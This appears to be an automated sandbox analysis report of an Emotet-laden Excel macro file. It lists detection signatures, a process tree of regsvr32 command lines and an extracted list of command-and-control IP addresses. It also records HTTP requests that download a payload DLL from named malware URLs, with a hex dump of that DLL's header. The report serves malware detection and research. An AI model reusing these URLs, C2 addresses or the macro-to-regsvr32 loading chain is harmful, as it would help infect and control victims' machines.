Edit tour

Windows Analysis Report
doc_82555.xlsm

Overview

General Information

Sample Name:	doc_82555.xlsm
Analysis ID:	583250
MD5:	7bde64baa68b904ebf18541faa6bfce7
SHA1:	8f6d4160c09119c3169b2d013533a60a0c2bdce3
SHA256:	2f924502bd8e335411aa8a199d3071a25807e4d333b4dad175e4fe5da3c1ab96
Infos:

Detection

Hidden Macro 4.0 Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Document exploit detected (drops PE files)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Antivirus / Scanner detection for submitted sample

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Document exploit detected (creates forbidden files)

Antivirus detection for URL or domain

Found malicious Excel 4.0 Macro

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: Regsvr32 Network Activity

Found Excel 4.0 Macro with suspicious formulas

Sigma detected: Regsvr32 Command Line Without DLL

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Hides that the sample has been downloaded from the Internet (zone.identifier)

Document exploit detected (process start blacklist hit)

Document exploit detected (UrlDownloadToFile)

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Found potential string decryption / allocating functions

Found evasive API chain (may stop execution after checking a module file name)

Sigma detected: Excel Network Connections

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Potential document exploit detected (performs DNS queries)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Downloads executable code via HTTP

Found a hidden Excel 4.0 Macro sheet

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Yara detected Xls With Macro 4.0

Connects to several IPs in different countries

Potential key logger detected (key state polling based)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Drops PE files to the user directory

Excel documents contains an embedded macro which executes code when the document is opened

Found large amount of non-executed APIs

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 820 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

regsvr32.exe (PID: 2092 cmdline: C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx MD5: 432BE6CF7311062633459EEF6B242FB5)

regsvr32.exe (PID: 2236 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bvzagchljm\dwkzewjivpn.djh" MD5: 432BE6CF7311062633459EEF6B242FB5)

regsvr32.exe (PID: 2628 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Cfuxhhimriog\usertmslb.fpr" MD5: 432BE6CF7311062633459EEF6B242FB5)

regsvr32.exe (PID: 772 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Mgmxxtvaciu\fmyrhviayqbjkvb.voe" MD5: 432BE6CF7311062633459EEF6B242FB5)

cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["186.250.48.5:80", "168.119.39.118:443", "185.168.130.138:443", "190.90.233.66:443", "159.69.237.188:443", "54.37.228.122:443", "93.104.209.107:8080", "185.148.168.15:8080", "198.199.98.78:8080", "87.106.97.83:7080", "195.77.239.39:8080", "37.44.244.177:8080", "54.38.242.185:443", "185.184.25.78:8080", "116.124.128.206:8080", "139.196.72.155:8080", "128.199.192.135:8080", "103.41.204.169:8080", "78.47.204.80:443", "68.183.93.250:443", "194.9.172.107:8080", "37.59.209.141:8080", "85.214.67.203:8080", "78.46.73.125:443", "195.154.146.35:443", "191.252.103.16:80", "118.98.72.86:443", "185.148.168.220:8080", "217.182.143.207:443", "168.197.250.14:80", "62.171.178.147:8080", "104.131.62.48:8080", "203.153.216.46:443", "210.57.209.142:8080", "59.148.253.194:443", "207.148.81.119:8080", "54.37.106.167:8080", "66.42.57.149:443", "45.71.195.104:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
app.xml	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.426206883.0000000000140000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.420143508.00000000001C0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.434777664.0000000000230000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.693604509.0000000000180000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.694212085.0000000010001000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.427216974.0000000010001000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.435993356.0000000010001000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author
4.2.regsvr32.exe.10000000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.regsvr32.exe.180000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.230000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.230000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.regsvr32.exe.180000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.regsvr32.exe.140000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.regsvr32.exe.1c0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.regsvr32.exe.140000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.regsvr32.exe.10000000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.regsvr32.exe.1c0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.10000000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.regsvr32.exe.10000000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 7 entries

Sigma Signatures

System Summary

Sigma detected: Microsoft Office Product Spawning Windows Shell

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx, CommandLine: C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 820, ProcessCommandLine: C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx, ProcessId: 2092

Sigma detected: Regsvr32 Network Activity

Source: Network Connection

Author: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 186.250.48.5, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\regsvr32.exe, Initiated: true, ProcessId: 772, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: Regsvr32 Command Line Without DLL

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bvzagchljm\dwkzewjivpn.djh", CommandLine: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bvzagchljm\dwkzewjivpn.djh", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 2092, ProcessCommandLine: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bvzagchljm\dwkzewjivpn.djh", ProcessId: 2236

Source: Network Connection

Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0": Data: DestinationIp: 212.64.200.154, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 820, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 1B 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 820, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 5.2.regsvr32.exe.10000000.1.unpack

Malware Configuration Extractor: Emotet {"C2 list": ["186.250.48.5:80", "168.119.39.118:443", "185.168.130.138:443", "190.90.233.66:443", "159.69.237.188:443", "54.37.228.122:443", "93.104.209.107:8080", "185.148.168.15:8080", "198.199.98.78:8080", "87.106.97.83:7080", "195.77.239.39:8080", "37.44.244.177:8080", "54.38.242.185:443", "185.184.25.78:8080", "116.124.128.206:8080", "139.196.72.155:8080", "128.199.192.135:8080", "103.41.204.169:8080", "78.47.204.80:443", "68.183.93.250:443", "194.9.172.107:8080", "37.59.209.141:8080", "85.214.67.203:8080", "78.46.73.125:443", "195.154.146.35:443", "191.252.103.16:80", "118.98.72.86:443", "185.148.168.220:8080", "217.182.143.207:443", "168.197.250.14:80", "62.171.178.147:8080", "104.131.62.48:8080", "203.153.216.46:443", "210.57.209.142:8080", "59.148.253.194:443", "207.148.81.119:8080", "54.37.106.167:8080", "66.42.57.149:443", "45.71.195.104:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}

Multi AV Scanner detection for submitted file

Source: doc_82555.xlsm	Virustotal: Detection: 43%	Perma Link
Source: doc_82555.xlsm	Metadefender: Detection: 20%	Perma Link
Source: doc_82555.xlsm	ReversingLabs: Detection: 61%

Antivirus / Scanner detection for submitted sample

Source: doc_82555.xlsm

Avira: detected

Antivirus detection for URL or domain

Source: https://186.250.48.5/;	Avira URL Cloud: Label: malware
Source: http://gymsportive.com/0zwe/pSiUh/	Avira URL Cloud: Label: malware
Source: https://186.250.48.5/	Avira URL Cloud: Label: malware
Source: https://186.250.48.5:80/hODqBouciZtjCAXSu	Avira URL Cloud: Label: malware
Source: http://danialteb.com/wp-admin/NqRYgwPERRPoTs/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: danialteb.com	Virustotal: Detection: 7%	Perma Link
Source: gymsportive.com	Virustotal: Detection: 9%	Perma Link
Source: http://gymsportive.com/0zwe/pSiUh/	Virustotal: Detection: 15%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ouyGhPOm[1].dll	ReversingLabs: Detection: 45%
Source: C:\Users\user\sei.ocx	ReversingLabs: Detection: 45%
Source: C:\Windows\SysWOW64\Bvzagchljm\dwkzewjivpn.djh (copy)	ReversingLabs: Detection: 45%

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6DA4CD09 __EH_prolog3_GS,GetFullPathNameA,_DebugHeapAllocator,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,_DebugHeapAllocator,		3_2_6DA4CD09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1000FE4B FindFirstFileW,		6_2_1000FE4B

Software Vulnerabilities

Document exploit detected (drops PE files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: ouyGhPOm[1].dll.0.dr

Jump to dropped file

Document exploit detected (creates forbidden files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ouyGhPOm[1].dll

Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Source: global traffic

DNS query: name: gymsportive.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 212.64.200.154:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 212.64.200.154:80

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe

Network Connect: 186.250.48.5 80

Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 186.250.48.5:80
Source: Malware configuration extractor	IPs: 168.119.39.118:443
Source: Malware configuration extractor	IPs: 185.168.130.138:443
Source: Malware configuration extractor	IPs: 190.90.233.66:443
Source: Malware configuration extractor	IPs: 159.69.237.188:443
Source: Malware configuration extractor	IPs: 54.37.228.122:443
Source: Malware configuration extractor	IPs: 93.104.209.107:8080
Source: Malware configuration extractor	IPs: 185.148.168.15:8080
Source: Malware configuration extractor	IPs: 198.199.98.78:8080
Source: Malware configuration extractor	IPs: 87.106.97.83:7080
Source: Malware configuration extractor	IPs: 195.77.239.39:8080
Source: Malware configuration extractor	IPs: 37.44.244.177:8080
Source: Malware configuration extractor	IPs: 54.38.242.185:443
Source: Malware configuration extractor	IPs: 185.184.25.78:8080
Source: Malware configuration extractor	IPs: 116.124.128.206:8080
Source: Malware configuration extractor	IPs: 139.196.72.155:8080
Source: Malware configuration extractor	IPs: 128.199.192.135:8080
Source: Malware configuration extractor	IPs: 103.41.204.169:8080
Source: Malware configuration extractor	IPs: 78.47.204.80:443
Source: Malware configuration extractor	IPs: 68.183.93.250:443
Source: Malware configuration extractor	IPs: 194.9.172.107:8080
Source: Malware configuration extractor	IPs: 37.59.209.141:8080
Source: Malware configuration extractor	IPs: 85.214.67.203:8080
Source: Malware configuration extractor	IPs: 78.46.73.125:443
Source: Malware configuration extractor	IPs: 195.154.146.35:443
Source: Malware configuration extractor	IPs: 191.252.103.16:80
Source: Malware configuration extractor	IPs: 118.98.72.86:443
Source: Malware configuration extractor	IPs: 185.148.168.220:8080
Source: Malware configuration extractor	IPs: 217.182.143.207:443
Source: Malware configuration extractor	IPs: 168.197.250.14:80
Source: Malware configuration extractor	IPs: 62.171.178.147:8080
Source: Malware configuration extractor	IPs: 104.131.62.48:8080
Source: Malware configuration extractor	IPs: 203.153.216.46:443
Source: Malware configuration extractor	IPs: 210.57.209.142:8080
Source: Malware configuration extractor	IPs: 59.148.253.194:443
Source: Malware configuration extractor	IPs: 207.148.81.119:8080
Source: Malware configuration extractor	IPs: 54.37.106.167:8080
Source: Malware configuration extractor	IPs: 66.42.57.149:443
Source: Malware configuration extractor	IPs: 45.71.195.104:8080

Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS

Source: Joe Sandbox View	IP Address: 207.148.81.119 207.148.81.119
Source: Joe Sandbox View	IP Address: 104.131.62.48 104.131.62.48
Source: Joe Sandbox View	IP Address: 198.199.98.78 198.199.98.78

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKConnection: Keep-AliveX-Powered-By: PHP/7.3.13Set-Cookie: 622220f0dde1d=1646403824; expires=Fri, 04-Mar-2022 14:24:44 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 04 Mar 2022 14:23:44 GMTExpires: Fri, 04 Mar 2022 14:23:44 GMTContent-Type: application/x-msdownloadContent-Disposition: attachment; filename="ouyGhPOm.dll"Content-Transfer-Encoding: binaryContent-Length: 626176Date: Fri, 04 Mar 2022 14:23:44 GMTServer: LiteSpeedVary: User-AgentData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cb cf 2f 5a 8f ae 41 09 8f ae 41 09 8f ae 41 09 a8 68 2c 09 85 ae 41 09 a8 68 3a 09 98 ae 41 09 8f ae 40 09 ac ac 41 09 91 fc d4 09 ab ae 41 09 91 fc c2 09 1e ae 41 09 91 fc c5 09 2c ae 41 09 91 fc d3 09 8e ae 41 09 91 fc d5 09 8e ae 41 09 8f ae d6 09 8e ae 41 09 91 fc d0 09 8e ae 41 09 52 69 63 68 8f ae 41 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 28 d0 20 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 ea 04 00 00 dc 04 00 00 00 00 00 f0 ae 03 00 00 10 00 00 00 00 05 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 09 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 0e 06 00 ab 00 00 00 04 f0 05 00 f0 00 00 00 00 80 06 00 80 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 20 a1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 99 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 a8 05 00 00 7c ef 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e e9 04 00 00 10 00 00 00 ea 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ab 0e 01 00 00 00 05 00 00 10 01 00 00 ee 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 68 00 00 00 10 06 00 00 2e 00 00 00 fe 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 80 76 02 00 00 80 06 00 00 78 02 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 e9 00 00 00 00 09 00 00 ea 00 00 00 a4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@

Source: global traffic	HTTP traffic detected: GET /0zwe/pSiUh/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gymsportive.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-admin/NqRYgwPERRPoTs/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: danialteb.comConnection: Keep-Alive

Source: unknown

Network traffic detected: IP country count 15

Source: unknown	TCP traffic detected without corresponding DNS query: 186.250.48.5
Source: unknown	TCP traffic detected without corresponding DNS query: 186.250.48.5
Source: unknown	TCP traffic detected without corresponding DNS query: 186.250.48.5
Source: unknown	TCP traffic detected without corresponding DNS query: 186.250.48.5
Source: unknown	TCP traffic detected without corresponding DNS query: 186.250.48.5
Source: unknown	TCP traffic detected without corresponding DNS query: 186.250.48.5
Source: unknown	TCP traffic detected without corresponding DNS query: 186.250.48.5
Source: unknown	TCP traffic detected without corresponding DNS query: 186.250.48.5
Source: unknown	TCP traffic detected without corresponding DNS query: 186.250.48.5
Source: unknown	TCP traffic detected without corresponding DNS query: 186.250.48.5
Source: unknown	TCP traffic detected without corresponding DNS query: 186.250.48.5
Source: unknown	TCP traffic detected without corresponding DNS query: 186.250.48.5

Source: regsvr32.exe, 00000006.00000002.693761609.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587195173.00000000003E0000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: regsvr32.exe, 00000006.00000002.693761609.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587195173.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000006.00000002.693761609.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587195173.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000006.00000002.693761609.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587195173.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000006.00000002.693761609.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587195173.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000006.00000002.693761609.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587195173.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000006.00000002.693761609.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587195173.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: regsvr32.exe, 00000006.00000002.693761609.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587195173.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.6.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000006.00000002.693761609.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587195173.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en9
Source: regsvr32.exe, 00000006.00000002.693761609.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587195173.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000006.00000002.693761609.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587195173.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000006.00000002.693761609.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587195173.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000006.00000002.693761609.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587195173.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000006.00000002.693761609.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587195173.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000006.00000002.693761609.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587195173.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000006.00000002.693761609.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587195173.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmp, regsvr32.exe, 00000004.00000002.428460874.000000006DA88000.00000002.00000001.01000000.00000006.sdmp, regsvr32.exe, 00000005.00000002.436416494.000000006DA88000.00000002.00000001.01000000.00000007.sdmp, regsvr32.exe, 00000006.00000002.694332163.000000006DA88000.00000002.00000001.01000000.00000007.sdmp, ouyGhPOm[1].dll.0.dr, sei.ocx.0.dr	String found in binary or memory: http://www.codeproject.com
Source: regsvr32.exe, 00000006.00000002.693761609.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587195173.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000006.00000002.693761609.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587195173.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
